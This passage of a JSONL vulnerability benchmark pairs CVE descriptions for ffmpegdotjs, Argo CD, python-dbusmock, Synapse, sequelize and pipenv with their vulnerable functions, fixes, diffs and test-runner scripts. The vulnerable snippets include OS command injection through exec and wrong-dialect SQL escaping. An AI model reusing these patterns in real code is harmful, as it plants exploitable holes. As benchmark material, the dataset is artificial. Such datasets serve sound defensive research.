PromptTemplate(**config)"}], "vul_patch": "--- a/libs/langchain/langchain/prompts/loading.py\n+++ b/libs/langchain/langchain/prompts/loading.py\n@@ -3,4 +3,15 @@\n # Load the template from disk if necessary.\n config = _load_template(\"template\", config)\n config = _load_output_parser(config)\n+\n+ template_format = config.get(\"template_format\", \"f-string\")\n+ if template_format == \"jinja2\":\n+ # Disabled due to:\n+ # https://github.com/langchain-ai/langchain/issues/4394\n+ raise ValueError(\n+ f\"Loading templates with '{template_format}' format is no longer supported \"\n+ f\"since it can lead to arbitrary code execution. 
Please migrate to using \"\n+ f\"the 'f-string' template format, which does not suffer from this issue.\"\n+ )\n+\n return PromptTemplate(**config)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-23376", "cve_description": "This affects all versions of package ffmpegdotjs. If attacker-controlled user input is given to the trimvideo function, it is possible for an attacker to execute arbitrary commands. This is due to use of the child_process exec function without input sanitization.", "cwe_info": {"CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/TRomesh/ffmpegdotjs", "patch_url": ["https://github.com/TRomesh/ffmpegdotjs/commit/dae868764d6418dac081ed1aa84c636645ba6adb"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_21_1", "commit": "b7395da", "file_path": "index.js", "start_line": 216, "end_line": 233, "snippet": " trimvideo: (input, start, duration, output) => {\n return new Promise(function(resolve, reject) {\n if (fs.existsSync(input)) {\n exec(\n `ffmpeg -hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`,\n (error, stdout, stderr) => {\n if (error) {\n reject(error);\n return;\n }\n resolve(`${output}.mp4`);\n }\n );\n } else {\n reject(new Error(\"ffmpegdotjs could not find file\"));\n }\n });\n },"}], "fix_func": [{"id": "fix_js_21_1", "commit": "dae868764d6418dac081ed1aa84c636645ba6adb", "file_path": "index.js", "start_line": 216, "end_line": 233, "snippet": " trimvideo: (input, start, duration, output) => {\n return new Promise(function(resolve, reject) {\n if (fs.existsSync(input)) {\n execFile(\n 'ffmpeg', `-hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`.split(\" \"),\n (error, stdout, stderr) => {\n if (error) {\n reject(error);\n return;\n }\n resolve(`${output}.mp4`);\n }\n );\n } else {\n reject(new Error(\"ffmpegdotjs could not find file\"));\n }\n });\n },"}], "vul_patch": "--- a/index.js\n+++ b/index.js\n@@ -1,8 +1,8 @@\n trimvideo: (input, start, duration, output) => {\n return new Promise(function(resolve, reject) {\n if (fs.existsSync(input)) {\n- exec(\n- `ffmpeg -hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`,\n+ execFile(\n+ 'ffmpeg', `-hide_banner -loglevel quiet -ss ${start} -i ${input} -t ${duration} -c copy -y ${output}.mp4`.split(\" \"),\n (error, stdout, stderr) => {\n if (error) {\n reject(error);\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-23376:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/ffmpegdotjs\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\njest ./poc\n", "unit_test_cmd": null} {"cve_id": "CVE-2021-26921", "cve_description": "In util/session/sessionmanager.go in Argo CD before 1.8.4, tokens continue to work even when the user account is disabled.", "cwe_info": {"CWE-613": {"name": "Insufficient Session Expiration", "description": "According to WASC, \"Insufficient Session Expiration is when a web site permits an attacker to reuse old session credentials or session IDs for authorization.\""}}, "repo": 
"https://github.com/argoproj/argo-cd", "patch_url": ["https://github.com/argoproj/argo-cd/commit/f5b0db240b4e3abf18e97f6fd99096b4f9e94dc5"], "programing_language": "Go", "vul_func": [{"id": "vul_go_66_1", "commit": "ce43b7a", "file_path": "util/session/sessionmanager.go", "start_line": 239, "end_line": 294, "snippet": "func (mgr *SessionManager) Parse(tokenString string) (jwt.Claims, error) {\n\t// Parse takes the token string and a function for looking up the key. The latter is especially\n\t// useful if you use multiple keys for your application. The standard is to use 'kid' in the\n\t// head of the token to identify which key to use, but the parsed token (head and claims) is provided\n\t// to the callback, providing flexibility.\n\tvar claims jwt.MapClaims\n\tsettings, err := mgr.settingsMgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ttoken, err := jwt.ParseWithClaims(tokenString, &claims, func(token *jwt.Token) (interface{}, error) {\n\t\t// Don't forget to validate the alg is what you expect:\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"Unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t}\n\t\treturn settings.ServerSignature, nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tissuedAt, err := jwtutil.IssuedAtTime(claims)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsubject := jwtutil.StringField(claims, \"sub\")\n\tid := jwtutil.StringField(claims, \"jti\")\n\n\tif projName, role, ok := rbacpolicy.GetProjectRoleFromSubject(subject); ok {\n\t\tproj, err := mgr.projectsLister.Get(projName)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t_, _, err = proj.GetJWTToken(role, issuedAt.Unix(), id)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn token.Claims, nil\n\t}\n\n\taccount, err := mgr.settingsMgr.GetAccount(subject)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif id := jwtutil.StringField(claims, \"jti\"); id != \"\" && account.TokenIndex(id) == -1 {\n\t\treturn nil, fmt.Errorf(\"account %s does not have token with id %s\", subject, id)\n\t}\n\n\tif account.PasswordMtime != nil && issuedAt.Before(*account.PasswordMtime) {\n\t\treturn nil, fmt.Errorf(\"Account password has changed since token issued\")\n\t}\n\treturn token.Claims, nil\n}"}], "fix_func": [{"id": "fix_go_66_1", "commit": "f5b0db2", "file_path": "util/session/sessionmanager.go", "start_line": 239, "end_line": 298, "snippet": "func (mgr *SessionManager) Parse(tokenString string) (jwt.Claims, error) {\n\t// Parse takes the token string and a function for looking up the key. The latter is especially\n\t// useful if you use multiple keys for your application. 
The standard is to use 'kid' in the\n\t// head of the token to identify which key to use, but the parsed token (head and claims) is provided\n\t// to the callback, providing flexibility.\n\tvar claims jwt.MapClaims\n\tsettings, err := mgr.settingsMgr.GetSettings()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\ttoken, err := jwt.ParseWithClaims(tokenString, &claims, func(token *jwt.Token) (interface{}, error) {\n\t\t// Don't forget to validate the alg is what you expect:\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"Unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t}\n\t\treturn settings.ServerSignature, nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tissuedAt, err := jwtutil.IssuedAtTime(claims)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsubject := jwtutil.StringField(claims, \"sub\")\n\tid := jwtutil.StringField(claims, \"jti\")\n\n\tif projName, role, ok := rbacpolicy.GetProjectRoleFromSubject(subject); ok {\n\t\tproj, err := mgr.projectsLister.Get(projName)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\t_, _, err = proj.GetJWTToken(role, issuedAt.Unix(), id)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\treturn token.Claims, nil\n\t}\n\n\taccount, err := mgr.settingsMgr.GetAccount(subject)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tif !account.Enabled {\n\t\treturn nil, fmt.Errorf(\"account %s is disabled\", subject)\n\t}\n\n\tif id := jwtutil.StringField(claims, \"jti\"); id != \"\" && account.TokenIndex(id) == -1 {\n\t\treturn nil, fmt.Errorf(\"account %s does not have token with id %s\", subject, id)\n\t}\n\n\tif account.PasswordMtime != nil && issuedAt.Before(*account.PasswordMtime) {\n\t\treturn nil, fmt.Errorf(\"Account password has changed since token issued\")\n\t}\n\treturn token.Claims, nil\n}"}], "vul_patch": "--- a/util/session/sessionmanager.go\n+++ b/util/session/sessionmanager.go\n@@ -45,6 +45,10 @@\n \t\treturn nil, err\n \t}\n \n+\tif !account.Enabled {\n+\t\treturn nil, fmt.Errorf(\"account %s is disabled\", subject)\n+\t}\n+\n \tif id := jwtutil.StringField(claims, \"jti\"); id != \"\" && account.TokenIndex(id) == -1 {\n \t\treturn nil, fmt.Errorf(\"account %s does not have token with id %s\", subject, id)\n \t}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2021-26921:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/argo-cd\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./util/session && go test -timeout 30s -run ^TestSessionManager_AdminToken_Deactivated$ github.com/argoproj/argo-cd/util/session\n", "unit_test_cmd": null} {"cve_id": "CVE-2015-1326", "cve_description": "python-dbusmock before version 0.15.1 AddTemplate() D-Bus method call or DBusTestCase.spawn_server_template() method could be tricked into executing malicious code if an attacker supplies a .pyc file.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/martinpitt/python-dbusmock", "patch_url": ["https://github.com/martinpitt/python-dbusmock/commit/4e7d0df9093"], "programing_language": "Python", "vul_func": [{"id": "vul_py_68_1", "commit": "a4bd39f", "file_path": "dbusmock/mockobject.py", "start_line": 41, "end_line": 50, "snippet": "def load_module(name):\n if os.path.exists(name) and 
os.path.splitext(name)[1] == '.py':\n sys.path.insert(0, os.path.dirname(os.path.abspath(name)))\n try:\n m = os.path.splitext(os.path.basename(name))[0]\n module = importlib.import_module(m)\n finally:\n sys.path.pop(0)\n\n return module"}], "fix_func": [{"id": "fix_py_65_1", "commit": "4e7d0df9093", "file_path": "dbusmock/mockobject.py", "start_line": 42, "end_line": 49, "snippet": "def load_module(name):\n if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n mod = imp.new_module(os.path.splitext(os.path.basename(name))[0])\n with open(name) as f:\n exec(f.read(), mod.__dict__, mod.__dict__)\n return mod\n\n return importlib.import_module('dbusmock.templates.' + name)"}], "vul_patch": "--- a/dbusmock/mockobject.py\n+++ /dev/null\n@@ -1,10 +0,0 @@\n-def load_module(name):\n- if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n- sys.path.insert(0, os.path.dirname(os.path.abspath(name)))\n- try:\n- m = os.path.splitext(os.path.basename(name))[0]\n- module = importlib.import_module(m)\n- finally:\n- sys.path.pop(0)\n-\n- return module\n\n--- /dev/null\n+++ b/dbusmock/mockobject.py\n@@ -0,0 +1,8 @@\n+def load_module(name):\n+ if os.path.exists(name) and os.path.splitext(name)[1] == '.py':\n+ mod = imp.new_module(os.path.splitext(os.path.basename(name))[0])\n+ with open(name) as f:\n+ exec(f.read(), mod.__dict__, mod.__dict__)\n+ return mod\n+\n+ return importlib.import_module('dbusmock.templates.' + name)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-1326:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/python-dbusmock\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2015-1326/bin/python -m pytest tests/test_api.py::TestTemplates::test_local --disable-warnings\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2015-1326:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/python-dbusmock\ngit apply --whitespace=nowarn /workspace/fix.patch\n/workspace/PoC_env/CVE-2015-1326/bin/python -m pytest tests/test_api.py --disable-warnings\n"} {"cve_id": "CVE-2018-10657", "cve_description": "Matrix Synapse before 0.28.1 is prone to a denial of service flaw where malicious events injected with depth = 2^63 - 1 render rooms unusable, related to federation/federation_base.py and handlers/message.py, as exploited in the wild in April 2018.", "cwe_info": {"CWE-20": {"name": "Improper Input Validation", "description": "The product receives input or data, but it does\n not validate or incorrectly validates that the input has the\n properties that are required to process the data safely and\n correctly."}}, "repo": "https://github.com/matrix-org/synapse", "patch_url": ["https://github.com/matrix-org/synapse/commit/33f469ba19586bbafa0cf2c7d7c35463bdab87eb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_254_1", "commit": "28dd536", "file_path": "synapse/federation/federation_base.py", "start_line": 182, "end_line": 204, "snippet": "def event_from_pdu_json(pdu_json, outlier=False):\n \"\"\"Construct a FrozenEvent from an event json received over federation\n\n Args:\n pdu_json (object): pdu as received over federation\n outlier (bool): True to mark this event as an outlier\n\n Returns:\n FrozenEvent\n\n Raises:\n SynapseError: if the pdu is missing required fields\n \"\"\"\n # we could probably enforce a bunch of other fields here (room_id, sender,\n # origin, etc etc)\n assert_params_in_request(pdu_json, ('event_id', 'type'))\n event = 
FrozenEvent(\n pdu_json\n )\n\n event.internal_metadata.outlier = outlier\n\n return event"}, {"id": "vul_py_254_2", "commit": "28dd536", "file_path": "synapse/handlers/message.py", "start_line": 596, "end_line": 663, "snippet": " def create_new_client_event(self, builder, requester=None,\n prev_events_and_hashes=None):\n \"\"\"Create a new event for a local client\n\n Args:\n builder (EventBuilder):\n\n requester (synapse.types.Requester|None):\n\n prev_events_and_hashes (list[(str, dict[str, str], int)]|None):\n the forward extremities to use as the prev_events for the\n new event. For each event, a tuple of (event_id, hashes, depth)\n where *hashes* is a map from algorithm to hash.\n\n If None, they will be requested from the database.\n\n Returns:\n Deferred[(synapse.events.EventBase, synapse.events.snapshot.EventContext)]\n \"\"\"\n\n if prev_events_and_hashes is not None:\n assert len(prev_events_and_hashes) <= 10, \\\n \"Attempting to create an event with %i prev_events\" % (\n len(prev_events_and_hashes),\n )\n else:\n prev_events_and_hashes = \\\n yield self.store.get_prev_events_for_room(builder.room_id)\n\n if prev_events_and_hashes:\n depth = max([d for _, _, d in prev_events_and_hashes]) + 1\n else:\n depth = 1\n\n prev_events = [\n (event_id, prev_hashes)\n for event_id, prev_hashes, _ in prev_events_and_hashes\n ]\n\n builder.prev_events = prev_events\n builder.depth = depth\n\n context = yield self.state.compute_event_context(builder)\n if requester:\n context.app_service = requester.app_service\n\n if builder.is_state():\n builder.prev_state = yield self.store.add_event_hashes(\n context.prev_state_events\n )\n\n yield self.auth.add_auth_events(builder, context)\n\n signing_key = self.hs.config.signing_key[0]\n add_hashes_and_signatures(\n builder, self.server_name, signing_key\n )\n\n event = builder.build()\n\n logger.debug(\n \"Created event %s with state: %s\",\n event.event_id, context.prev_state_ids,\n )\n\n defer.returnValue(\n (event, context,)\n )"}], "fix_func": [{"id": "fix_py_254_1", "commit": "33f469b", "file_path": "synapse/federation/federation_base.py", "start_line": 185, "end_line": 219, "snippet": "def event_from_pdu_json(pdu_json, outlier=False):\n \"\"\"Construct a FrozenEvent from an event json received over federation\n\n Args:\n pdu_json (object): pdu as received over federation\n outlier (bool): True to mark this event as an outlier\n\n Returns:\n FrozenEvent\n\n Raises:\n SynapseError: if the pdu is missing required fields or is otherwise\n not a valid matrix event\n \"\"\"\n # we could probably enforce a bunch of other fields here (room_id, sender,\n # origin, etc etc)\n assert_params_in_request(pdu_json, ('event_id', 'type', 'depth'))\n\n depth = pdu_json['depth']\n if not isinstance(depth, six.integer_types):\n raise SynapseError(400, \"Depth %r not an intger\" % (depth, ),\n Codes.BAD_JSON)\n\n if depth < 0:\n raise SynapseError(400, \"Depth too small\", Codes.BAD_JSON)\n elif depth > MAX_DEPTH:\n raise SynapseError(400, \"Depth too large\", Codes.BAD_JSON)\n\n event = FrozenEvent(\n pdu_json\n )\n\n event.internal_metadata.outlier = outlier\n\n return event"}, {"id": "fix_py_254_2", "commit": "33f469b", "file_path": "synapse/handlers/message.py", "start_line": 596, "end_line": 667, "snippet": " def create_new_client_event(self, builder, requester=None,\n prev_events_and_hashes=None):\n \"\"\"Create a new event for a local client\n\n Args:\n builder (EventBuilder):\n\n requester (synapse.types.Requester|None):\n\n prev_events_and_hashes 
(list[(str, dict[str, str], int)]|None):\n the forward extremities to use as the prev_events for the\n new event. For each event, a tuple of (event_id, hashes, depth)\n where *hashes* is a map from algorithm to hash.\n\n If None, they will be requested from the database.\n\n Returns:\n Deferred[(synapse.events.EventBase, synapse.events.snapshot.EventContext)]\n \"\"\"\n\n if prev_events_and_hashes is not None:\n assert len(prev_events_and_hashes) <= 10, \\\n \"Attempting to create an event with %i prev_events\" % (\n len(prev_events_and_hashes),\n )\n else:\n prev_events_and_hashes = \\\n yield self.store.get_prev_events_for_room(builder.room_id)\n\n if prev_events_and_hashes:\n depth = max([d for _, _, d in prev_events_and_hashes]) + 1\n # we cap depth of generated events, to ensure that they are not\n # rejected by other servers (and so that they can be persisted in\n # the db)\n depth = min(depth, MAX_DEPTH)\n else:\n depth = 1\n\n prev_events = [\n (event_id, prev_hashes)\n for event_id, prev_hashes, _ in prev_events_and_hashes\n ]\n\n builder.prev_events = prev_events\n builder.depth = depth\n\n context = yield self.state.compute_event_context(builder)\n if requester:\n context.app_service = requester.app_service\n\n if builder.is_state():\n builder.prev_state = yield self.store.add_event_hashes(\n context.prev_state_events\n )\n\n yield self.auth.add_auth_events(builder, context)\n\n signing_key = self.hs.config.signing_key[0]\n add_hashes_and_signatures(\n builder, self.server_name, signing_key\n )\n\n event = builder.build()\n\n logger.debug(\n \"Created event %s with state: %s\",\n event.event_id, context.prev_state_ids,\n )\n\n defer.returnValue(\n (event, context,)\n )"}], "vul_patch": "--- a/synapse/federation/federation_base.py\n+++ b/synapse/federation/federation_base.py\n@@ -9,11 +9,23 @@\n FrozenEvent\n \n Raises:\n- SynapseError: if the pdu is missing required fields\n+ SynapseError: if the pdu is missing required fields or is otherwise\n+ not a valid matrix event\n \"\"\"\n # we could probably enforce a bunch of other fields here (room_id, sender,\n # origin, etc etc)\n- assert_params_in_request(pdu_json, ('event_id', 'type'))\n+ assert_params_in_request(pdu_json, ('event_id', 'type', 'depth'))\n+\n+ depth = pdu_json['depth']\n+ if not isinstance(depth, six.integer_types):\n+ raise SynapseError(400, \"Depth %r not an intger\" % (depth, ),\n+ Codes.BAD_JSON)\n+\n+ if depth < 0:\n+ raise SynapseError(400, \"Depth too small\", Codes.BAD_JSON)\n+ elif depth > MAX_DEPTH:\n+ raise SynapseError(400, \"Depth too large\", Codes.BAD_JSON)\n+\n event = FrozenEvent(\n pdu_json\n )\n\n--- a/synapse/handlers/message.py\n+++ b/synapse/handlers/message.py\n@@ -29,6 +29,10 @@\n \n if prev_events_and_hashes:\n depth = max([d for _, _, d in prev_events_and_hashes]) + 1\n+ # we cap depth of generated events, to ensure that they are not\n+ # rejected by other servers (and so that they can be persisted in\n+ # the db)\n+ depth = min(depth, MAX_DEPTH)\n else:\n depth = 1\n \n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2016-10554", "cve_description": "sequelize is an Object-relational mapping, or a middleman to convert things from Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server into usable data for NodeJS. 
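The sequelize record (CVE-2016-10554) that continues below hinges on a dialect mismatch: MySQL escapes a quote as `\'`, while SQLite, like Postgres, treats the backslash as a literal character and escapes a quote by doubling it. This runnable `sqlite3` sketch (table and payload invented for the demo) shows the backslash-escaped value breaking out of the string literal, and the doubled-quote form staying inert, which is exactly what the patch switches the sqlite dialect to.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

inp = "x' OR 1=1 --"                    # attacker-controlled value

mysql_style = inp.replace("'", "\\'")   # backslash escaping: wrong dialect for SQLite
rows = conn.execute(f"SELECT secret FROM users WHERE name = '{mysql_style}'").fetchall()
print(rows)  # [('s3cret',)] -- the \' did not escape the quote, so OR 1=1 ran

pg_style = inp.replace("'", "''")       # quote doubling: what the fix uses for sqlite
rows = conn.execute(f"SELECT secret FROM users WHERE name = '{pg_style}'").fetchall()
print(rows)  # [] -- the payload stayed inside the string literal
```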
Before version 1.7.0-alpha3, sequelize defaulted SQLite to use MySQL backslash escaping, even though SQLite uses Postgres escaping.", "cwe_info": {"CWE-89": {"name": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')", "description": "The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data."}}, "repo": "https://github.com/sequelize/sequelize", "patch_url": ["https://github.com/sequelize/sequelize/commit/c876192aa6ce1f67e22b26a4d175b8478615f42d"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_178_1", "commit": "7dc35e3", "file_path": "lib/sql-string.js", "start_line": 10, "end_line": 57, "snippet": "SqlString.escape = function(val, stringifyObjects, timeZone, dialect) {\n if (val === undefined || val === null) {\n return 'NULL';\n }\n\n switch (typeof val) {\n case 'boolean': return (val) ? 'true' : 'false';\n case 'number': return val+'';\n }\n\n if (val instanceof Date) {\n val = SqlString.dateToString(val, timeZone || \"Z\");\n }\n\n if (Buffer.isBuffer(val)) {\n return SqlString.bufferToString(val);\n }\n\n if (Array.isArray(val)) {\n return SqlString.arrayToList(val, timeZone);\n }\n\n if (typeof val === 'object') {\n if (stringifyObjects) {\n val = val.toString();\n } else {\n return SqlString.objectToValues(val, timeZone);\n }\n }\n\n if (dialect == \"postgres\") {\n // http://www.postgresql.org/docs/8.2/static/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS\n val = val.replace(/'/g, \"''\");\n } else {\n val = val.replace(/[\\0\\n\\r\\b\\t\\\\\\'\\\"\\x1a]/g, function(s) {\n switch(s) {\n case \"\\0\": return \"\\\\0\";\n case \"\\n\": return \"\\\\n\";\n case \"\\r\": return \"\\\\r\";\n case \"\\b\": return \"\\\\b\";\n case \"\\t\": return \"\\\\t\";\n case \"\\x1a\": return \"\\\\Z\";\n default: return \"\\\\\"+s;\n }\n });\n }\n return \"'\"+val+\"'\";\n};"}], "fix_func": [{"id": "fix_js_178_1", "commit": "c876192", "file_path": "lib/sql-string.js", "start_line": 10, "end_line": 58, "snippet": "SqlString.escape = function(val, stringifyObjects, timeZone, dialect) {\n if (val === undefined || val === null) {\n return 'NULL';\n }\n\n switch (typeof val) {\n case 'boolean': return (val) ? 
'true' : 'false';\n case 'number': return val+'';\n }\n\n if (val instanceof Date) {\n val = SqlString.dateToString(val, timeZone || \"Z\");\n }\n\n if (Buffer.isBuffer(val)) {\n return SqlString.bufferToString(val);\n }\n\n if (Array.isArray(val)) {\n return SqlString.arrayToList(val, timeZone);\n }\n\n if (typeof val === 'object') {\n if (stringifyObjects) {\n val = val.toString();\n } else {\n return SqlString.objectToValues(val, timeZone);\n }\n }\n\n if (dialect === \"postgres\" || dialect === \"sqlite\") {\n // http://www.postgresql.org/docs/8.2/static/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS\n // http://stackoverflow.com/q/603572/130598\n val = val.replace(/'/g, \"''\");\n } else {\n val = val.replace(/[\\0\\n\\r\\b\\t\\\\\\'\\\"\\x1a]/g, function(s) {\n switch(s) {\n case \"\\0\": return \"\\\\0\";\n case \"\\n\": return \"\\\\n\";\n case \"\\r\": return \"\\\\r\";\n case \"\\b\": return \"\\\\b\";\n case \"\\t\": return \"\\\\t\";\n case \"\\x1a\": return \"\\\\Z\";\n default: return \"\\\\\"+s;\n }\n });\n }\n return \"'\"+val+\"'\";\n};"}], "vul_patch": "--- a/lib/sql-string.js\n+++ b/lib/sql-string.js\n@@ -28,8 +28,9 @@\n }\n }\n \n- if (dialect == \"postgres\") {\n+ if (dialect === \"postgres\" || dialect === \"sqlite\") {\n // http://www.postgresql.org/docs/8.2/static/sql-syntax-lexical.html#SQL-SYNTAX-STRINGS\n+ // http://stackoverflow.com/q/603572/130598\n val = val.replace(/'/g, \"''\");\n } else {\n val = val.replace(/[\\0\\n\\r\\b\\t\\\\\\'\\\"\\x1a]/g, function(s) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-21668", "cve_description": "pipenv is a Python development workflow tool. Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious `--index-url` option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. This issue is patched in version 2022.1.8. 
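The pipenv record (CVE-2022-21668) in progress here has `import_requirements` compare `--trusted-host` entries and index URLs on a normalized `host[:port]` form before deciding whether an index must serve valid HTTPS, instead of comparing raw strings. Below is a minimal sketch of that normalization built on urllib3's `parse_url`, which the patch's `get_host_and_port` helper also uses (the surrounding helper names are mine, not pipenv's).

```python
from urllib3.util import parse_url

def host_and_port(url: str) -> str:
    # "https://example.com:8081/simple" -> "example.com:8081"; no port -> host only
    parsed = parse_url(url)
    return f"{parsed.host}:{parsed.port}" if parsed.port else parsed.host

trusted = {host_and_port("http://example.com:8080")}  # from a --trusted-host line

def requires_valid_https(index_url: str) -> bool:
    hp = host_and_port(index_url)
    # Trusted if the exact host:port matches, or the bare hostname was trusted.
    return hp not in trusted and hp.partition(":")[0] not in trusted

print(requires_valid_https("http://example.com:8080/simple"))  # False: trusted host
print(requires_valid_https("https://pypi.org/simple"))         # True
```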
The GitHub Security Advisory contains more information about this vulnerability.", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/pypa/pipenv", "patch_url": ["https://github.com/pypa/pipenv/commit/439782a8ae36c4762c88e43d5f0d8e563371b46f"], "programing_language": "Python", "vul_func": [{"id": "vul_py_411_1", "commit": "9cb42e1acb0c36d706cccfaa01e296fcebc8a8b0", "file_path": "pipenv/core.py", "start_line": 147, "end_line": 190, "snippet": "def import_requirements(project, r=None, dev=False):\n from pipenv.patched.notpip._vendor import requests as pip_requests\n from pipenv.patched.notpip._internal.req.constructors import install_req_from_parsed_requirement\n from pipenv.vendor.pip_shims.shims import parse_requirements\n\n # Parse requirements.txt file with Pip's parser.\n # Pip requires a `PipSession` which is a subclass of requests.Session.\n # Since we're not making any network calls, it's initialized to nothing.\n if r:\n assert os.path.isfile(r)\n # Default path, if none is provided.\n if r is None:\n r = project.requirements_location\n with open(r) as f:\n contents = f.read()\n indexes = []\n trusted_hosts = []\n # Find and add extra indexes.\n for line in contents.split(\"\\n\"):\n index, extra_index, trusted_host, _ = parse_indexes(line.strip(), strict=True)\n if index:\n indexes = [index]\n if extra_index:\n indexes.append(extra_index)\n if trusted_host:\n trusted_hosts.append(trusted_host)\n indexes = sorted(set(indexes))\n trusted_hosts = sorted(set(trusted_hosts))\n reqs = [install_req_from_parsed_requirement(f) for f in parse_requirements(r, session=pip_requests)]\n for package in reqs:\n if package.name not in BAD_PACKAGES:\n if package.link is not None:\n package_string = (\n f\"-e {package.link}\"\n if package.editable\n else str(package.link)\n )\n project.add_package_to_pipfile(package_string, dev=dev)\n else:\n project.add_package_to_pipfile(str(package.req), dev=dev)\n for index in indexes:\n trusted = index in trusted_hosts\n project.add_index_to_pipfile(index, verify_ssl=trusted)\n project.recase_pipfile()"}], "fix_func": [{"id": "fix_py_411_1", "commit": "439782a8ae36c4762c88e43d5f0d8e563371b46f", "file_path": "pipenv/core.py", "start_line": 147, "end_line": 195, "snippet": "def import_requirements(project, r=None, dev=False):\n from pipenv.patched.notpip._vendor import requests as pip_requests\n from pipenv.patched.notpip._internal.req.constructors 
import install_req_from_parsed_requirement\n from pipenv.vendor.pip_shims.shims import parse_requirements\n\n # Parse requirements.txt file with Pip's parser.\n # Pip requires a `PipSession` which is a subclass of requests.Session.\n # Since we're not making any network calls, it's initialized to nothing.\n if r:\n assert os.path.isfile(r)\n # Default path, if none is provided.\n if r is None:\n r = project.requirements_location\n with open(r) as f:\n contents = f.read()\n indexes = []\n trusted_hosts = []\n # Find and add extra indexes.\n for line in contents.split(\"\\n\"):\n index, extra_index, trusted_host, _ = parse_indexes(line.strip(), strict=True)\n if index:\n indexes = [index]\n if extra_index:\n indexes.append(extra_index)\n if trusted_host:\n trusted_hosts.append(get_host_and_port(trusted_host))\n indexes = sorted(set(indexes))\n trusted_hosts = sorted(set(trusted_hosts))\n reqs = [install_req_from_parsed_requirement(f) for f in parse_requirements(r, session=pip_requests)]\n for package in reqs:\n if package.name not in BAD_PACKAGES:\n if package.link is not None:\n package_string = (\n f\"-e 